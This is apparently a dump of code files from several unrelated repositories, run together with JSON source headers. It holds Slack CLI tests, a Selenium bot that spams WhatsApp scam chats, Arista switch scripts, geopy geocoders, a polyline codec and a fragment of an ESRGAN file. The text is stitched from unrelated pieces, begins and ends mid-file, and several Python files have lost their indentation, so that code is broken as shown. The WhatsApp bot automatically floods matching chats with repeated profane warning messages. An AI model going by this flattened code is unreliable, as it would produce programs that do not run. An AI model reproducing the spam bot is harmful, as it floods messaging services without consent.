assert popular_post.ts == "1622007986.001500"
assert popular_post.num_reaction == 3
def test__award_without_post(self) -> None:
client: MockSlackClient = MockSlackClient()
message_manager: MessageManager = MessageManager(client)
result: str = message_manager.award(channel="general", post=False)
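        # Expected award message (Japanese): "The most reactions went to this post by
        # <@W012A3CDE|spengler>! Congratulations! :raised_hands:" followed by the permalink.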
expected: str = (
"最もリアクションを獲得したのは "
"<@W012A3CDE|spengler>さんのこのポスト!"
"おめでとうございます!:raised_hands:\n"
"https://ghostbusters.slack.com/archives/C1H9RESGA/p135854651500008"
)
assert result is not None
assert result == expected
```
#### File: slck-cli/tests/test_user.py
```python
from typing import List
import pytest
from mock_slack_client import MockSlackClient
from slck.user import User, UserManager, UserNotFoundError
class TestUserManager:
def test__initialize(self) -> None:
client: MockSlackClient = MockSlackClient()
UserManager(client)
def test__list_users(self) -> None:
client: MockSlackClient = MockSlackClient()
user_manager: UserManager = UserManager(client)
users: List[User] = user_manager.list()
assert len(users) == 2
def test__find_user_by_id(self) -> None:
client: MockSlackClient = MockSlackClient()
user_manager: UserManager = UserManager(client)
user: User = user_manager.find(id="W07QCRPA4")[0]
assert user.id == "W07QCRPA4"
assert user.name == "glinda"
assert user.real_name == "<NAME>"
def test__find_user_by_name(self) -> None:
client: MockSlackClient = MockSlackClient()
user_manager: UserManager = UserManager(client)
user: User = user_manager.find(name="glinda")[0]
assert user.id == "W07QCRPA4"
assert user.name == "glinda"
assert user.real_name == "<NAME>"
def test__find_user_by_real_name(self) -> None:
client: MockSlackClient = MockSlackClient()
user_manager: UserManager = UserManager(client)
user: User = user_manager.find(real_name="<NAME>")[0]
assert user.id == "W07QCRPA4"
assert user.name == "glinda"
assert user.real_name == "<NAME>"
def test__cannot_find_user(self) -> None:
client: MockSlackClient = MockSlackClient()
user_manager: UserManager = UserManager(client)
with pytest.raises(UserNotFoundError):
user_manager.find(real_name="No One")
``` |
{
"source": "joeyame/ScammerSpammer",
"score": 3
} |
#### File: joeyame/ScammerSpammer/__main__.py
```python
import os
import threading
from time import sleep
from selenium import webdriver
from selenium.common.exceptions import JavascriptException
# To get started we navigate into the module directory
os.chdir(__file__[:__file__.rfind("/")])
##################################################
# This section is where we set up the program
print("Initializing ScammerRevenge...")
# Change these settings as desired
settings = {}
settings["headless"] = False
settings["spamChatName"] = "HY Investment"
settings["enableScamAlertMessage"] = True
# Print current setup
print("Current settings:")
print("Headless mode:", settings["headless"])
print("Searching for chats that contain:", settings["spamChatName"])
print("Enable scam alert messages:", settings["enableScamAlertMessage"])
#################################################################
# This section is what actually drives the spamming thread
# threading.Event() allows us to tell the spamming thread to stop
spam2 = threading.Event()
def startSpamming1():
# Set up webdriver options
options = webdriver.ChromeOptions()
options.add_argument(f"user-data-dir=./chromeProfiles/fuckscammers")
options.add_argument(f"headless={settings['headless']}")
driver1 = webdriver.Chrome( f'./chromedriver', options=options )
# Get the whatsapp website
driver1.get("https://web.whatsapp.com")
# Wait for the chat list to become available
elem = driver1.execute_script('return document.querySelector("#pane-side > div:nth-child(1) > div > div")')
while elem is None:
elem = driver1.execute_script('return document.querySelector("#pane-side > div:nth-child(1) > div > div")')
elem.click()
# While we aren't supposed to stop...
while not spam2.is_set():
try:
# Build list of scam chats:
schats = []
for child in driver1.execute_script('return document.querySelector("#pane-side > div:nth-child(1) > div > div").children'):
if settings["spamChatName"] in child.get_attribute('innerText'):
schats.append(child)
# Switch between the chats
for child in schats:
child.click()
sleep(0.2)
# Only send a chat message if we are supposed to
if(settings["enableScamAlertMessage"]):
# Also, only send the chat in response to a message that does not contain the string "SCAM ALERT" and does not contain the word "Left"
if(not "SCAM ALERT" in driver1.execute_script('return document.querySelector("#main > div._1LcQK > div > div._33LGR > div.y8WcF").lastElementChild.innerText')) and (not "left" in driver1.execute_script('return document.querySelector("#main > div._1LcQK > div > div._33LGR > div.y8WcF").lastElementChild.innerText')):
# Get input box
msgin = driver1.execute_script('return document.querySelector("#main > footer > div._2BU3P.tm2tP.copyable-area > div > span:nth-child(2) > div > div._2lMWa > div.p3_M1 > div > div._13NKt.copyable-text.selectable-text")')
# Type in the scam alert message
msgin.send_keys("*SCAM ALERT!* Do not click on any links within this chat. These bastards *will STEAL your money!* Please block them immediately and revisit your privacy settings to ensure you never get added again. *SCAM ALERT!*\n")
# If there is a javascript exception rub it off and keep going.
except JavascriptException:
print("Javascript exception")
# Close the driver when we are done
driver1.close()
#################################################################
# Now we create the thread that runs the spambot and get it started
thread = threading.Thread(target=startSpamming1)
thread.start()
# Wait for user to press enter
input("Press enter to stop the program")
# Give the signal to shutdown the spambot
spam2.set()
# Pull thread into this one
thread.join()
# Done!
##################################################
``` |
{
"source": "joeyamosjohns/final_project_nhl_prediction_first_draft",
"score": 3
} |
#### File: src/modules/data_clean.py
```python
import pandas as pd
import numpy as np
def perc_null(X):
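    # Summarize missing data per column: total null count, dtype, and fraction of nulls.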
total = X.isnull().sum().sort_values(ascending=False)
data_types = X.dtypes
percent = (X.isnull().sum()/X.isnull().count()).sort_values(ascending=False)
missing_data = pd.concat([total, data_types, percent], axis=1, keys=['Total','Type' ,'Percent'])
return missing_data
#for X in data_frames:
# print(perc_null(X)['Total'].sum())
##goalie stats, skater stats, team_stats all have NaN ...
## I think missing vals are in df_mp ... deal later
``` |
{
"source": "joeyb182/pynet_ansible",
"score": 2
} |
#### File: pynet_ansible/byers-paid/week_7_exercise_1.py
```python
import pyeapi
from pprint import pprint
pynet_sw2 = pyeapi.connect_to("pynet-sw2") #this name is from the config file
output = pynet_sw2.enable("show interfaces") #the .enable indicates it's going to run it as enable mode...only looking for commands
def pyeapi_result(output):
'''
Return the 'result' value from the pyeapi output
'''
return output[0]['result']
s_i = pyeapi_result(output)
s_i = s_i['interfaces']
for k,v in s_i.items():
try:
inOct = v['interfaceCounters']['inOctets']
outOct = v['interfaceCounters']['outOctets']
print k,'\ninOctets: ' ,inOct,'\noutOctets: ' ,outOct,'\n'
except:
print 'no counters on: ' + k
```
#### File: pynet_ansible/byers-paid/week_7_exercise_2.py
```python
import pyeapi
from pprint import pprint
import argparse
# Argument parsing
parser = argparse.ArgumentParser(description="addition/removal of VLAN to Arista switch")
parser.add_argument("vlan_id", help="VLAN number to create or remove", action="store", type=int)
parser.add_argument("--name",help="Specify VLAN name",action="store",dest="vlan_name",type=str)
parser.add_argument("--remove", help="Remove the given VLAN ID", action="store_true")
cli_args = parser.parse_args()
vlan_id = cli_args.vlan_id
vlan_id = int(vlan_id)
remove = cli_args.remove
vlan_name = cli_args.vlan_name
pynet_sw2 = pyeapi.connect_to("pynet-sw2") #this name is from the config file
output = pynet_sw2.enable("show vlan") #the .enable indicates it's going to run it as enable mode...only looking for commands
def pyeapi_result(output):
'''
Return the 'result' value from the pyeapi output
'''
return output[0]['result']
s_v = pyeapi_result(output)
#this strips the returned data to JUST the vlans
s_v = s_v['vlans']
vlan_exists = False
cmds = []
#this iterates through the list of VLANs for our VLAN we specified to remove, and sets remove_the_vlan from False to True if it's there
for k,v in s_v.items():
k = int(k)
if k == vlan_id:
vlan_exists = True
vlan_id = str(vlan_id)
#update our command list (command) with removing the VLAN if it needs to go
if remove:
if vlan_exists == True:
temp_str = 'no vlan '+ vlan_id
cmds = [temp_str]
else:
print "the VLAN doesn't exist, can't delete it"
else: #otherwise check to see if it exists and don't add it or add it if it's not there
if vlan_exists == True:
print "the VLAN already exists, we can't create it"
else:
id_str = 'vlan '+ vlan_id
name_str = 'name '+ vlan_name
cmds = [id_str,name_str]
#issue our commands
pynet_sw2.config(cmds)
#write mem after done
pynet_sw2.enable("write memory")
``` |
{
"source": "joeybaba/incubator-superset",
"score": 2
} |
#### File: geopy/geocoders/algolia.py
```python
from geopy.compat import Request, urlencode
from geopy.geocoders.base import DEFAULT_SENTINEL, Geocoder
from geopy.location import Location
from geopy.point import Point
from geopy.util import logger
__all__ = ('AlgoliaPlaces',)
class AlgoliaPlaces(Geocoder):
"""Geocoder using the Algolia Places API.
Documentation at:
https://community.algolia.com/places/documentation.html
.. versionadded:: 1.22.0
"""
geocode_path = '/1/places/query'
reverse_path = '/1/places/reverse'
def __init__(
self,
app_id=None,
api_key=None,
domain='places-dsn.algolia.net',
format_string=None,
scheme=None,
timeout=DEFAULT_SENTINEL,
proxies=DEFAULT_SENTINEL,
user_agent=None,
ssl_context=DEFAULT_SENTINEL,
):
"""
:param str app_id: Unique application identifier. It's used to
identify you when using Algolia's API.
See https://www.algolia.com/dashboard.
:param str api_key: Algolia's user API key.
:param str domain: Currently it is ``'places-dsn.algolia.net'``,
can be changed for testing purposes.
:param str format_string:
See :attr:`geopy.geocoders.options.default_format_string`.
.. deprecated:: 1.22.0
:param str scheme:
See :attr:`geopy.geocoders.options.default_scheme`.
:param int timeout:
See :attr:`geopy.geocoders.options.default_timeout`.
:param dict proxies:
See :attr:`geopy.geocoders.options.default_proxies`.
:param str user_agent:
See :attr:`geopy.geocoders.options.default_user_agent`.
:type ssl_context: :class:`ssl.SSLContext`
:param ssl_context:
See :attr:`geopy.geocoders.options.default_ssl_context`.
"""
super(AlgoliaPlaces, self).__init__(
format_string=format_string,
scheme=scheme,
timeout=timeout,
proxies=proxies,
user_agent=user_agent,
ssl_context=ssl_context,
)
self.domain = domain.strip('/')
self.app_id = app_id
self.api_key = api_key
self.geocode_api = (
'%s://%s%s' % (self.scheme, self.domain, self.geocode_path)
)
self.reverse_api = (
'%s://%s%s' % (self.scheme, self.domain, self.reverse_path)
)
def geocode(
self,
query,
exactly_one=True,
timeout=DEFAULT_SENTINEL,
type=None,
restrict_searchable_attributes=None,
limit=None,
language=None,
countries=None,
around=None,
around_via_ip=None,
around_radius=None,
x_forwarded_for=None,
):
"""
Return a location point by address.
:param str query: The address or query you wish to geocode.
:param bool exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
:param str type: Restrict the search results to a specific type.
Available types are defined in documentation:
https://community.algolia.com/places/api-clients.html#api-options-type
:param str restrict_searchable_attributes: Restrict the fields in which
the search is done.
:param int limit: Limit the maximum number of items in the
response. If not provided and there are multiple results
Algolia API will return 20 results by default. This will be
reset to one if ``exactly_one`` is True.
:param str language: If specified, restrict the search results
to a single language. You can pass two letters country
codes (ISO 639-1).
:param list countries: If specified, restrict the search results
to a specific list of countries. You can pass two letters
country codes (ISO 3166-1).
:param around: Force to first search around a specific
latitude longitude.
:type around: :class:`geopy.point.Point`, list or tuple of
``(latitude, longitude)``, or string as ``"%(latitude)s,
%(longitude)s"``.
:param bool around_via_ip: Whether or not to first search
around the geolocation of the user found via his IP address.
This is true by default.
:param around_radius: Radius in meters to search around the
latitude/longitude. Otherwise a default radius is
automatically computed given the area density.
:param str x_forwarded_for: Override the HTTP header X-Forwarded-For.
With this you can control the source IP address used to resolve
the geo-location of the user. This is particularly useful when
you want to use the API from your backend as if it was from your
end-users' locations.
:rtype: ``None``, :class:`geopy.location.Location` or a list of them, if
``exactly_one=False``.
"""
params = {
'query': self.format_string % query,
}
if type is not None:
params['type'] = type
if restrict_searchable_attributes is not None:
params['restrictSearchableAttributes'] = restrict_searchable_attributes
if limit is not None:
params['hitsPerPage'] = limit
if exactly_one:
params["hitsPerPage"] = 1
if language is not None:
params['language'] = language.lower()
if countries is not None:
params['countries'] = ','.join([c.lower() for c in countries])
if around is not None:
p = Point(around)
params['aroundLatLng'] = "%s,%s" % (p.latitude, p.longitude)
if around_via_ip is not None:
params['aroundLatLngViaIP'] = \
'true' if around_via_ip else 'false'
if around_radius is not None:
params['aroundRadius'] = around_radius
url = '?'.join((self.geocode_api, urlencode(params)))
request = Request(url)
if x_forwarded_for is not None:
request.add_header('X-Forwarded-For', x_forwarded_for)
if self.app_id is not None and self.api_key is not None:
request.add_header('X-Algolia-Application-Id', self.app_id)
request.add_header('X-Algolia-API-Key', self.api_key)
logger.debug('%s.geocode: %s', self.__class__.__name__, url)
return self._parse_json(
self._call_geocoder(request, timeout=timeout),
exactly_one,
language=language,
)
def reverse(
self,
query,
exactly_one=True,
timeout=DEFAULT_SENTINEL,
limit=None,
language=None,
):
"""
Return an address by location point.
:param query: The coordinates for which you wish to obtain the
closest human-readable addresses.
:type query: :class:`geopy.point.Point`, list or tuple of ``(latitude,
longitude)``, or string as ``"%(latitude)s, %(longitude)s"``.
:param bool exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
:param int limit: Limit the maximum number of items in the
response. If not provided and there are multiple results
Algolia API will return 20 results by default. This will be
reset to one if ``exactly_one`` is True.
:param str language: If specified, restrict the search results
to a single language. You can pass two letters country
codes (ISO 639-1).
:rtype: ``None``, :class:`geopy.location.Location` or a list of them, if
``exactly_one=False``.
"""
location = self._coerce_point_to_string(query)
params = {
'aroundLatLng': location,
}
if limit is not None:
params['hitsPerPage'] = limit
if language is not None:
params['language'] = language
url = '?'.join((self.reverse_api, urlencode(params)))
request = Request(url)
if self.app_id is not None and self.api_key is not None:
request.add_header('X-Algolia-Application-Id', self.app_id)
request.add_header('X-Algolia-API-Key', self.api_key)
logger.debug("%s.reverse: %s", self.__class__.__name__, url)
return self._parse_json(
self._call_geocoder(request, timeout=timeout),
exactly_one,
language=language,
)
@staticmethod
def _parse_feature(feature, language):
# Parse each resource.
latitude = feature.get('_geoloc', {}).get('lat')
longitude = feature.get('_geoloc', {}).get('lng')
if isinstance(feature['locale_names'], dict):
if language in feature['locale_names']:
placename = feature['locale_names'][language][0]
else:
placename = feature['locale_names']["default"][0]
else:
placename = feature['locale_names'][0]
return Location(placename, (latitude, longitude), feature)
@classmethod
def _parse_json(self, response, exactly_one, language):
if response is None or 'hits' not in response:
return None
features = response['hits']
if not len(features):
return None
if exactly_one:
return self._parse_feature(features[0], language=language)
else:
return [
self._parse_feature(feature, language=language) for feature in features
]
```
#### File: geopy/geocoders/ignfrance.py
```python
import warnings
import xml.etree.ElementTree as ET
from geopy.compat import (
HTTPBasicAuthHandler,
HTTPPasswordMgrWithDefaultRealm,
Request,
build_opener,
iteritems,
u,
urlencode,
)
from geopy.exc import ConfigurationError, GeocoderQueryError
from geopy.geocoders.base import DEFAULT_SENTINEL, Geocoder
from geopy.location import Location
from geopy.util import logger
__all__ = ("IGNFrance", )
class IGNFrance(Geocoder):
"""Geocoder using the IGN France GeoCoder OpenLS API.
Documentation at:
https://geoservices.ign.fr/documentation/geoservices/index.html
"""
xml_request = """<?xml version="1.0" encoding="UTF-8"?>
<XLS version="1.2"
xmlns="http://www.opengis.net/xls"
xmlns:gml="http://www.opengis.net/gml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.opengis.net/xls
http://schemas.opengis.net/ols/1.2/olsAll.xsd">
<RequestHeader srsName="epsg:4326"/>
<Request methodName="{method_name}"
maximumResponses="{maximum_responses}"
requestID=""
version="1.2">
{sub_request}
</Request>
</XLS>"""
api_path = '/%(api_key)s/geoportail/ols'
def __init__(
self,
api_key,
username=None,
        password=None,
referer=None,
domain='wxs.ign.fr',
scheme=None,
timeout=DEFAULT_SENTINEL,
proxies=DEFAULT_SENTINEL,
user_agent=None,
format_string=None,
ssl_context=DEFAULT_SENTINEL,
):
"""
:param str api_key: The API key required by IGN France API
to perform geocoding requests. You can get your key here:
https://geoservices.ign.fr/documentation/services-acces.html.
Mandatory. For authentication with referer
and with username/password, the api key always differ.
:param str username: When making a call need HTTP simple
authentication username. Mandatory if no referer set
:param str password: When making a call need HTTP simple
authentication password. Mandatory if no referer set
:param str referer: When making a call need HTTP referer.
Mandatory if no password and username
:param str domain: Currently it is ``'wxs.ign.fr'``, can
be changed for testing purposes for developer API
e.g ``'gpp3-wxs.ign.fr'`` at the moment.
:param str scheme:
See :attr:`geopy.geocoders.options.default_scheme`.
:param int timeout:
See :attr:`geopy.geocoders.options.default_timeout`.
:param dict proxies:
See :attr:`geopy.geocoders.options.default_proxies`.
:param str user_agent:
See :attr:`geopy.geocoders.options.default_user_agent`.
.. versionadded:: 1.12.0
:param str format_string:
See :attr:`geopy.geocoders.options.default_format_string`.
.. versionadded:: 1.14.0
.. deprecated:: 1.22.0
:type ssl_context: :class:`ssl.SSLContext`
:param ssl_context:
See :attr:`geopy.geocoders.options.default_ssl_context`.
.. versionadded:: 1.14.0
"""
super(IGNFrance, self).__init__(
format_string=format_string,
scheme=scheme,
timeout=timeout,
proxies=proxies,
user_agent=user_agent,
ssl_context=ssl_context,
)
# Catch if no api key with username and password
# or no api key with referer
if not ((api_key and username and password) or (api_key and referer)):
raise ConfigurationError('You should provide an api key and a '
'username with a password or an api '
'key with a referer depending on '
'created api key')
if (username and password) and referer:
raise ConfigurationError('You can\'t set username/password and '
'referer together. The API key always '
'differs depending on both scenarios')
if username and not password:
raise ConfigurationError(
'username and password must be set together'
)
self.api_key = api_key
self.username = username
self.password = password
self.referer = referer
self.domain = domain.strip('/')
api_path = self.api_path % dict(api_key=self.api_key)
self.api = '%s://%s%s' % (self.scheme, self.domain, api_path)
if username and password and referer is None:
self.addSimpleHTTPAuthHeader()
def geocode(
self,
query,
query_type='StreetAddress',
maximum_responses=25,
is_freeform=False,
filtering=None,
exactly_one=True,
timeout=DEFAULT_SENTINEL,
):
"""
Return a location point by address.
:param str query: The query string to be geocoded.
:param str query_type: The type to provide for geocoding. It can be
`PositionOfInterest`, `StreetAddress` or `CadastralParcel`.
`StreetAddress` is the default choice if none provided.
:param int maximum_responses: The maximum number of responses
to ask to the API in the query body.
:param str is_freeform: Set if return is structured with
freeform structure or a more structured returned.
By default, value is False.
:param str filtering: Provide string that help setting geocoder
filter. It contains an XML string. See examples in documentation
and ignfrance.py file in directory tests.
:param bool exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
:rtype: ``None``, :class:`geopy.location.Location` or a list of them, if
``exactly_one=False``.
"""
query = self.format_string % query
# Check if acceptable query type
if query_type not in ['PositionOfInterest',
'StreetAddress',
'CadastralParcel']:
raise GeocoderQueryError("""You did not provided a query_type the
webservice can consume. It should be PositionOfInterest,
'StreetAddress or CadastralParcel""")
# Check query validity for CadastralParcel
if query_type == 'CadastralParcel' and len(query.strip()) != 14:
raise GeocoderQueryError("""You must send a string of fourteen
characters long to match the cadastre required code""")
sub_request = """
<GeocodeRequest returnFreeForm="{is_freeform}">
<Address countryCode="{query_type}">
<freeFormAddress>{query}</freeFormAddress>
{filtering}
</Address>
</GeocodeRequest>
"""
xml_request = self.xml_request.format(
method_name='LocationUtilityService',
sub_request=sub_request,
maximum_responses=maximum_responses
)
        # Convert the boolean to the lowercase string expected in the XML request
if is_freeform:
is_freeform = 'true'
else:
is_freeform = 'false'
# Manage filtering value
if filtering is None:
filtering = ''
# Create query using parameters
request_string = xml_request.format(
is_freeform=is_freeform,
query=query,
query_type=query_type,
filtering=filtering
)
params = {
'xls': request_string
}
url = "?".join((self.api, urlencode(params)))
logger.debug("%s.geocode: %s", self.__class__.__name__, url)
raw_xml = self._request_raw_content(url, timeout)
return self._parse_xml(
raw_xml,
is_freeform=is_freeform,
exactly_one=exactly_one
)
def reverse(
self,
query,
reverse_geocode_preference=('StreetAddress', ),
maximum_responses=25,
filtering='',
exactly_one=DEFAULT_SENTINEL,
timeout=DEFAULT_SENTINEL,
):
"""
Return an address by location point.
:param query: The coordinates for which you wish to obtain the
closest human-readable addresses.
:type query: :class:`geopy.point.Point`, list or tuple of ``(latitude,
longitude)``, or string as ``"%(latitude)s, %(longitude)s"``.
        :param list reverse_geocode_preference: Sets the expected result
            type. It can be `StreetAddress` or `PositionOfInterest`.
            Defaults to `StreetAddress`.
:param int maximum_responses: The maximum number of responses
to ask to the API in the query body.
        :param str filtering: An XML string used to filter the geocoder
            results. See the examples in the documentation and in the
            ignfrance.py file in the tests directory.
:param bool exactly_one: Return one result or a list of results, if
available.
.. versionchanged:: 1.14.0
Default value for ``exactly_one`` was ``False``, which differs
from the conventional default across geopy. Please always pass
this argument explicitly, otherwise you would get a warning.
In geopy 2.0 the default value will become ``True``.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
:rtype: ``None``, :class:`geopy.location.Location` or a list of them, if
``exactly_one=False``.
"""
if exactly_one is DEFAULT_SENTINEL:
warnings.warn('%s.reverse: default value for `exactly_one` '
'argument will become True in geopy 2.0. '
'Specify `exactly_one=False` as the argument '
'explicitly to get rid of this warning.' % type(self).__name__,
DeprecationWarning, stacklevel=2)
exactly_one = False
sub_request = """
<ReverseGeocodeRequest>
{reverse_geocode_preference}
<Position>
<gml:Point>
<gml:pos>{query}</gml:pos>
</gml:Point>
{filtering}
</Position>
</ReverseGeocodeRequest>
"""
xml_request = self.xml_request.format(
method_name='ReverseGeocodeRequest',
sub_request=sub_request,
maximum_responses=maximum_responses
)
for pref in reverse_geocode_preference:
if pref not in ('StreetAddress', 'PositionOfInterest'):
raise GeocoderQueryError(
'`reverse_geocode_preference` must contain '
'one or more of: StreetAddress, PositionOfInterest'
)
point = self._coerce_point_to_string(query, "%(lat)s %(lon)s")
reverse_geocode_preference = '\n'.join((
'<ReverseGeocodePreference>%s</ReverseGeocodePreference>' % pref
for pref
in reverse_geocode_preference
))
request_string = xml_request.format(
maximum_responses=maximum_responses,
query=point,
reverse_geocode_preference=reverse_geocode_preference,
filtering=filtering
)
url = "?".join((self.api, urlencode({'xls': request_string})))
logger.debug("%s.reverse: %s", self.__class__.__name__, url)
raw_xml = self._request_raw_content(url, timeout)
return self._parse_xml(
raw_xml,
exactly_one=exactly_one,
is_reverse=True,
is_freeform='false'
)
def addSimpleHTTPAuthHeader(self):
# TODO make this a private API
# Create Urllib request object embedding HTTP simple authentication
sub_request = """
<GeocodeRequest returnFreeForm="{is_freeform}">
<Address countryCode="{query_type}">
<freeFormAddress>{query}</freeFormAddress>
</Address>
</GeocodeRequest>
"""
xml_request = self.xml_request.format(
method_name='LocationUtilityService',
sub_request=sub_request,
maximum_responses=1
)
# Create query using parameters
request_string = xml_request.format(
is_freeform='false',
query='rennes',
query_type='PositionOfInterest'
)
params = {
'xls': request_string
}
top_level_url = "?".join((self.api, urlencode(params)))
password_mgr = HTTPPasswordMgrWithDefaultRealm()
# Add the username and password.
# If we knew the realm, we could use it instead of None.
password_mgr.add_password(
None,
top_level_url,
self.username,
self.password
)
handler = HTTPBasicAuthHandler(password_mgr)
# create "opener" (OpenerDirector instance)
opener = build_opener(handler)
# Install the opener.
# Now all calls to urllib.request.urlopen use our opener.
self.urlopen = opener.open
def _parse_xml(self,
page,
is_reverse=False,
is_freeform=False,
exactly_one=True):
"""
Returns location, (latitude, longitude) from XML feed
and transform to json
"""
# Parse the page
tree = ET.fromstring(page.encode('utf-8'))
# Clean tree from namespace to facilitate XML manipulation
def remove_namespace(doc, namespace):
"""Remove namespace in the document in place."""
ns = '{%s}' % namespace
ns = u(ns)
nsl = len(ns)
for elem in doc.iter():
if elem.tag.startswith(ns):
elem.tag = elem.tag[nsl:]
remove_namespace(tree, 'http://www.opengis.net/gml')
remove_namespace(tree, 'http://www.opengis.net/xls')
remove_namespace(tree, 'http://www.opengis.net/xlsext')
# Return places as json instead of XML
places = self._xml_to_json_places(tree, is_reverse=is_reverse)
if not places:
return None
if exactly_one:
return self._parse_place(places[0], is_freeform=is_freeform)
else:
return [
self._parse_place(
place,
is_freeform=is_freeform
) for place in places
]
@staticmethod
def _xml_to_json_places(tree, is_reverse=False):
"""
        Transform the XML ElementTree returned by the webservice into json
"""
select_multi = (
'GeocodedAddress'
if not is_reverse
else 'ReverseGeocodedLocation'
)
adresses = tree.findall('.//' + select_multi)
places = []
sel_pl = './/Address/Place[@type="{}"]'
for adr in adresses:
el = {}
el['pos'] = adr.find('./Point/pos')
el['street'] = adr.find('.//Address/StreetAddress/Street')
el['freeformaddress'] = adr.find('.//Address/freeFormAddress')
el['municipality'] = adr.find(sel_pl.format('Municipality'))
el['numero'] = adr.find(sel_pl.format('Numero'))
el['feuille'] = adr.find(sel_pl.format('Feuille'))
el['section'] = adr.find(sel_pl.format('Section'))
el['departement'] = adr.find(sel_pl.format('Departement'))
el['commune_absorbee'] = adr.find(sel_pl.format('CommuneAbsorbee'))
el['commune'] = adr.find(sel_pl.format('Commune'))
el['insee'] = adr.find(sel_pl.format('INSEE'))
el['qualite'] = adr.find(sel_pl.format('Qualite'))
el['territoire'] = adr.find(sel_pl.format('Territoire'))
el['id'] = adr.find(sel_pl.format('ID'))
el['id_tr'] = adr.find(sel_pl.format('ID_TR'))
el['bbox'] = adr.find(sel_pl.format('Bbox'))
el['nature'] = adr.find(sel_pl.format('Nature'))
el['postal_code'] = adr.find('.//Address/PostalCode')
el['extended_geocode_match_code'] = adr.find(
'.//ExtendedGeocodeMatchCode'
)
place = {}
def testContentAttrib(selector, key):
"""
                Helper to select by attribute; returns None if the
                element or the attribute is missing
"""
return selector.attrib.get(
key,
None
) if selector is not None else None
place['accuracy'] = testContentAttrib(
adr.find('.//GeocodeMatchCode'), 'accuracy')
place['match_type'] = testContentAttrib(
adr.find('.//GeocodeMatchCode'), 'matchType')
place['building'] = testContentAttrib(
adr.find('.//Address/StreetAddress/Building'), 'number')
place['search_centre_distance'] = testContentAttrib(
adr.find('.//SearchCentreDistance'), 'value')
for key, value in iteritems(el):
if value is not None:
place[key] = value.text
if value.text is None:
place[key] = None
else:
place[key] = None
# We check if lat lng is not empty and unpack accordingly
if place['pos']:
lat, lng = place['pos'].split(' ')
place['lat'] = lat.strip()
place['lng'] = lng.strip()
else:
place['lat'] = place['lng'] = None
# We removed the unused key
place.pop("pos", None)
places.append(place)
return places
def _request_raw_content(self, url, timeout):
"""
Send the request to get raw content.
"""
request = Request(url)
if self.referer is not None:
request.add_header('Referer', self.referer)
raw_xml = self._call_geocoder(
request,
timeout=timeout,
deserializer=None
)
return raw_xml
@staticmethod
def _parse_place(place, is_freeform=None):
"""
Get the location, lat, lng and place from a single json place.
"""
        # Freeform results already contain the full address
if is_freeform == 'true':
location = place.get('freeformaddress')
else:
            # For a cadastral parcel
if place.get('numero'):
location = place.get('street')
else:
# When classic geocoding
# or when reverse geocoding
location = "%s %s" % (
place.get('postal_code', ''),
place.get('commune', ''),
)
if place.get('street'):
location = "%s, %s" % (
place.get('street', ''),
location,
)
if place.get('building'):
location = "%s %s" % (
place.get('building', ''),
location,
)
return Location(location, (place.get('lat'), place.get('lng')), place)
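# --- Illustrative usage sketch (added for clarity; not part of the original geopy module) ---
# A minimal example of how the geocoder defined above might be driven. The API key,
# referer and queries are placeholder assumptions: a real key obtained from IGN France
# and network access are required for these calls to succeed.
if __name__ == "__main__":
    # Referer-based authentication: only `api_key` and `referer` are needed.
    geocoder = IGNFrance(api_key="YOUR_IGN_API_KEY", referer="http://www.example.com")
    # Forward geocoding of a free-form street address.
    location = geocoder.geocode("8 boulevard du port, Amiens", query_type="StreetAddress")
    if location is not None:
        print(location.address, location.latitude, location.longitude)
    # Reverse geocoding of a "latitude, longitude" string.
    addresses = geocoder.reverse("48.8566, 2.3522", exactly_one=False)
    for address in addresses or []:
        print(address.address)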
```
#### File: site-packages/polyline/codec.py
```python
import itertools
import six
import math
class PolylineCodec(object):
def _pcitr(self, iterable):
return six.moves.zip(iterable, itertools.islice(iterable, 1, None))
def _py2_round(self, x):
# The polyline algorithm uses Python 2's way of rounding
return int(math.copysign(math.floor(math.fabs(x) + 0.5), x))
def _write(self, output, curr_value, prev_value, factor):
curr_value = self._py2_round(curr_value * factor)
prev_value = self._py2_round(prev_value * factor)
coord = curr_value - prev_value
coord <<= 1
coord = coord if coord >= 0 else ~coord
while coord >= 0x20:
output.write(six.unichr((0x20 | (coord & 0x1f)) + 63))
coord >>= 5
output.write(six.unichr(coord + 63))
def _trans(self, value, index):
byte, result, shift = None, 0, 0
while byte is None or byte >= 0x20:
byte = ord(value[index]) - 63
index += 1
result |= (byte & 0x1f) << shift
shift += 5
comp = result & 1
return ~(result >> 1) if comp else (result >> 1), index
def decode(self, expression, precision=5, geojson=False):
coordinates, index, lat, lng, length, factor = [], 0, 0, 0, len(expression), float(10 ** precision)
while index < length:
lat_change, index = self._trans(expression, index)
lng_change, index = self._trans(expression, index)
lat += lat_change
lng += lng_change
coordinates.append((lat / factor, lng / factor))
if geojson is True:
coordinates = [t[::-1] for t in coordinates]
return coordinates
def encode(self, coordinates, precision=5, geojson=False):
if geojson is True:
coordinates = [t[::-1] for t in coordinates]
output, factor = six.StringIO(), int(10 ** precision)
self._write(output, coordinates[0][0], 0, factor)
self._write(output, coordinates[0][1], 0, factor)
for prev, curr in self._pcitr(coordinates):
self._write(output, curr[0], prev[0], factor)
self._write(output, curr[1], prev[1], factor)
return output.getvalue()
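# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# Round-trips the canonical example coordinates from the polyline format docs
# through the encoder/decoder above.
if __name__ == "__main__":
    codec = PolylineCodec()
    coords = [(38.5, -120.2), (40.7, -120.95), (43.252, -126.453)]
    encoded = codec.encode(coords, precision=5)
    print(encoded)  # expected: '_p~iF~ps|U_ulLnnqC_mqNvxq`@'
    decoded = codec.decode(encoded, precision=5)
    print(decoded)  # recovers the original coordinates (to 1e-5 precision)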
``` |
{
"source": "joeyballentine/ESRGAN",
"score": 2
} |
#### File: utils/architecture/RRDB.py
```python
import functools
import math
import re
